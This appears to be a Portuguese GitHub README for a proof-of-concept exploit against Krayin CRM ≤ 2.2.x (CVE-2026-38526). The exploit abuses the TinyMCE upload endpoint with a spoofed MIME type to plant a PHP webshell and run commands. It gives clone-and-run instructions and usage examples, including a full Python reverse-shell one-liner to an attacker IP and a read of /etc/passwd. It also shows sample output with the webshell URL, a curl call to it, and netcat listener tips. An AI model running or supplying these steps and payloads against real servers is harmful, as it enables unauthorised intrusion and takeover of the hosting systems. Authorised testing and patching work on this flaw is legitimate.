
Exploit automatizado para o Krayin CRM ≤ 2.2.x.
Exploit automatizado para Krayin CRM ≤ 2.2.x. Este script explora uma vulnerabilidade de upload de arquivos irrestrito no endpoint TinyMCE (/admin/tinymce/upload), burla a validação de tipo MIME falsificando image/jpeg, faz upload de um webshell PHP e executa comandos arbitrários com privilégios do servidor web.
| Propriedade | Valor |
|---|---|
| CVE ID | CVE-2026-38526 |
| Software Afetado | Krayin CRM ≤ 2.2.x |
| Tipo de Vulnerabilidade | Upload Irrestrito de Arquivos → Execução Remota de Código |
| Autenticação | Necessária (qualquer conta de administrador válida) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <URL_ALVO> -u <USUARIO> -p <SENHA> [-c <COMANDO>]
# Verificação básica
python3 CVE-2026-38526.py -i http://alvo.com -u [email protected] -p "AdminPassword123!"
# Comando personalizado
python3 CVE-2026-38526.py -i alvo.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i alvo.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"IP_ATACANTE\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload com tipo MIME falsificado[*] Alvo: http://alvo.com
[*] Usuário: [email protected]
[*] Autenticando...
[+] Autenticação bem-sucedida
[*] Enviando webshell...
[+] Webshell enviado: http://alvo.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMADO - Execução Remota de Código
[*] Executando: id
[*] Saída:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Execução manual (curl):
curl 'http://alvo.com/storage/tinymce/abc123def456.php?cmd=id'
Falha na Autenticação: Verifique se as credenciais estão corretas e se a conta existe no alvo.
Falha na Extração do Token CSRF: Certifique-se de que o alvo está executando o Krayin CRM vulnerável e que o endpoint de login está acessível.
Reverse Shell não Conecta: Certifique-se de que seu listener está em execução (nc -lvnp <PORTA>), as regras de firewall permitem conexões de saída e o IP/porta no payload estão corretos.
Esta ferramenta é fornecida estritamente para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema alvo. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.
b0nyo - Implementação do PoC
TREXNEGRO - Descoberta da Vulnerabilidade
| Bandeira | Descrição | Exemplo |
|---|
-i | URL do alvo (com ou sem http://) | http://alvo.com ou alvo.com |
-u | Email/nome de usuário admin | [email protected] |
-p | Senha do admin | AdminPassword123! |
-c | Comando a executar (padrão: id) | whoami |